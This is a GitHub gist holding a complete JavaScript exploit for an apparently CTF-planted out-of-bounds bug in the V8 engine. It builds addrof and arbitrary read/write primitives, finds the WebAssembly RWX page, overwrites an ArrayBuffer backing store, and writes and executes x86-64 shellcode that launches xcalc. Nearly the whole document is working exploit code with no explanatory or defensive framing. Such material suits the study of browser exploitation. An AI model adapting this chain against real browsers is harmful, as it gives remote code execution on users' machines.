Created
October 23, 2020 07:54
-
-
Save hkraw/129156ace94c216aaff0e13dbb82b2e2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var buf = new ArrayBuffer(8); | |
| var f64_buf = new Float64Array(buf); | |
| var u64_buf = new Uint32Array(buf); | |
| function ftoi(val) { | |
| f64_buf[0] = val; | |
| return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); | |
| } | |
| function itof(val) { | |
| u64_buf[0] = Number(val & 0xffffffffn); | |
| u64_buf[1] = Number(val >> 32n); | |
| return f64_buf[0]; | |
| } | |
| function printhex(s, val) { | |
| console.log(s+'0x'+val.toString(16)); | |
| } | |
| //OOB (GetLastElement, SetLastElement) | |
| var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]); | |
| var wasm_mod = new WebAssembly.Module(wasm_code); | |
| var wasm_instance = new WebAssembly.Instance(wasm_mod); | |
| var f = wasm_instance.exports.main; | |
| var arr_one = [1.1,1.1]; | |
| var obj_arr = [arr_one,arr_one]; | |
| var target_arr = [1.1,2.2]; | |
| var target_obj = [wasm_instance,target_arr]; | |
| var idk_why = [itof(0x1337n),itof(0x1887n)]; | |
| var object_arr_mp = ftoi(obj_arr.GetLastElement()); | |
| obj_arr.SetLastElement(itof(object_arr_mp + 0xa00000000n)); | |
| var target = ftoi(obj_arr.GetLastElement()); | |
| obj_arr.SetLastElement(itof(target + 0x424200000000n)); | |
| var double_arr_map = ftoi(target_arr[2]); | |
| var object_arr_map = ftoi(target_arr[6]); | |
| printhex('Double map: ',double_arr_map); | |
| printhex('Object map: ',object_arr_map); | |
| function addrof(object) { | |
| target_obj[0] = object; | |
| var address = target_arr[5]; | |
| return ftoi(address); | |
| } | |
| function arb_read(address) { | |
| target_arr[11] = itof(address); | |
| return ftoi(idk_why[0]); | |
| } | |
| function arb_write(address,val) { | |
| target_arr[11] = itof(address); | |
| idk_why[0] = itof(val); | |
| } | |
| var wasm_addr = addrof(wasm_instance); | |
| printhex('WASM: ',wasm_addr); | |
| var rwx = arb_read(wasm_addr+0x60n); | |
| printhex('RWX: ',rwx); | |
| var buf = new ArrayBuffer(0x100); | |
| var dataview = new DataView(buf); | |
| var buff_addr = addrof(buf); | |
| var backing_store_buf_addr = buff_addr + 0xcn; | |
| arb_write(backing_store_buf_addr,rwx); | |
| var shellcode = [0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00]; | |
| for (var i = 0;i < shellcode.length; i++) { | |
| dataview.setUint32(4*i,shellcode[i],true); | |
| } | |
| f(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment